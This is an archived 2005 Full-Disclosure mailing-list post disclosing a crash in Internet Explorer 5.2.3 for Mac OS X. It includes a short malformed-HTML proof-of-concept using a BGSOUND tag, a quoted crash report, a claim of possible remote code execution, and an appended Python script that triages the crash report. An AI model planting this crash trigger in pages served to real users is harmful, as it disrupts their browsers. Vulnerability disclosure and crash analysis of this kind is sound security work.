Re: [Full-disclosure] Microsoft IE 5.2.3 for Mac OSX crash
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Microsoft IE 5.2.3 for Mac OSX crash
- From: "Marco Mella" <marco.mella@xxxxxxxxxxxxxxxx>
- Date: Thu, 22 Sep 2005 14:16:11 +0200
Attached is a POC for the IE 5.2.3 browser.

--------------------------------------------------------------------
CONFIDENTIALITY NOTICE
This message and its attachments are addressed solely to the persons
above and may contain confidential information. If you have received
the message in error, be informed that any use of the content hereof
is prohibited. Please return it immediately to the sender and delete
the message. Should you have any questions, please contact us by
replying to webmaster@xxxxxxxxxxxxxxxx.
        Thank you
                                        www.telecomitalia.it
--------------------------------------------------------------------
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Style-Type" content="text/css">
<title></title>
<meta name="Generator" content="Cocoa HTML Writer">
<meta name="CocoaVersion" content="824.11">
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica}
</style>
</head>
<body>
<p class="p1"><HTML> <HEAD></p>
<p class="p1"><TABLE</p>
<p class="p1">><BGSOUND</p>
<p class="p1">about:file"" SRC=about:""</p>
<p class="p1">></p>
</body>
</html>
On 22/Sep/05, at 14:03, Marco Mella wrote:

> Microsoft IE 5.2.3 is the last IE browser released for Mac OSX.
> IE 5.2.3 contains a vulnerability that allows a remote attacker to
> crash the browser and potentially achieve remote code execution.
>
> A remote attacker could set up a malicious site and entice a victim to
> visit it, triggering the buffer overflow.
>
> Exploit tested on Tiger and Panther.
>
> Sample of POC (save to a file and open with IE to test locally)
> ---------------------------------------------------------------------------------
> Begin code------
>
>
>  >about:file"" SRC=about:""
>  >
>
> End of code-------
>
>
> Apple Crash Report
> ---------------------------
> OS Version: 10.4.2 (Build 8C46)
> Report Version: 3
>
> Command: Internet Explorer
> Path: /Applications/Internet Explorer.app/Contents/MacOS/Internet Explorer
> Parent: WindowServer [65]
>
> Version: 5.2.3 (5.2.3)
> Build Version: 30
> Project Name: MicrosoftIE5
> Source Version: 58150100
>
> PID: 854
> Thread: 7
>
> Exception: EXC_BAD_ACCESS (0x0001)
> Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x000002e4
>
> Thread 0:
> 0 libSystem.B.dylib 0x9000a778 mach_msg_trap + 8
> 1 libSystem.B.dylib 0x9000a6bc mach_msg + 60
> 2 ...ple.CoreServices.CarbonCore 0x90b661e4 SwitchContexts + 96
> 3 ...ple.CoreServices.CarbonCore 0x90b5be90 YieldToThread + 372
> .....
> snip----
>
> Regards,
> Marco
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
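
Added example, not part of the original message or its attachment: a first-pass triage of the crash report excerpt quoted above, pulling out the exception, the faulting address and whether the crashed thread's backtrace is actually present. The names `parse_report`, `triage` and `PAGE_SIZE` are hypothetical, and the 4 KiB unmapped first page is an assumption.

```python
import re

# Excerpt of the crash report quoted in the message above, line breaks restored.
REPORT = """\
Thread: 7

Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x000002e4

Thread 0:
0 libSystem.B.dylib 0x9000a778 mach_msg_trap + 8
1 libSystem.B.dylib 0x9000a6bc mach_msg + 60
2 ...ple.CoreServices.CarbonCore 0x90b661e4 SwitchContexts + 96
3 ...ple.CoreServices.CarbonCore 0x90b5be90 YieldToThread + 372
"""

PAGE_SIZE = 0x1000  # assumption: 4 KiB pages, first page left unmapped
FIELDS = {
    "crashed_thread": re.compile(r"^Thread:\s+(\d+)$"),
    "exception": re.compile(r"^Exception:\s+(\S+)"),
    "code": re.compile(r"^Codes:\s+(\S+)"),
    "fault_addr": re.compile(r"^Codes:.*\bat (0x[0-9a-fA-F]+)$"),
}
THREAD_RE = re.compile(r"^Thread (\d+)(?: Crashed)?:$")
FRAME_RE = re.compile(r"^\d+\s+(\S+)\s+(0x[0-9a-fA-F]+)\s+(\S+) \+ (\d+)$")

def parse_report(text):
    """Return header fields plus per-thread frames as (image, pc, symbol, offset)."""
    info, threads, current = {}, {}, None
    for line in map(str.strip, text.splitlines()):
        for name, rx in FIELDS.items():
            m = rx.match(line)
            if m:
                info[name] = m.group(1)
        m = THREAD_RE.match(line)
        if m:  # start of a per-thread backtrace section
            current = int(m.group(1))
            threads[current] = []
        m = FRAME_RE.match(line)
        if m and current is not None:
            threads[current].append((m.group(1), int(m.group(2), 16), m.group(3), int(m.group(4))))
    return {**info, "threads": threads}

def triage(info):
    """Facts a responder records first: where it faulted and which thread did."""
    addr, crashed = int(info["fault_addr"], 16), int(info["crashed_thread"])
    return {"exception": info["exception"], "code": info["code"],
            "fault_addr": addr, "near_null": addr < PAGE_SIZE,
            "crashed_thread": crashed,
            "have_crashed_backtrace": crashed in info["threads"]}
```

On this excerpt the faulting address lies in the first page, and the crashed thread (7) is not among the threads shown, so the visible Thread 0 frames cannot be tied to the fault without the snipped part of the report.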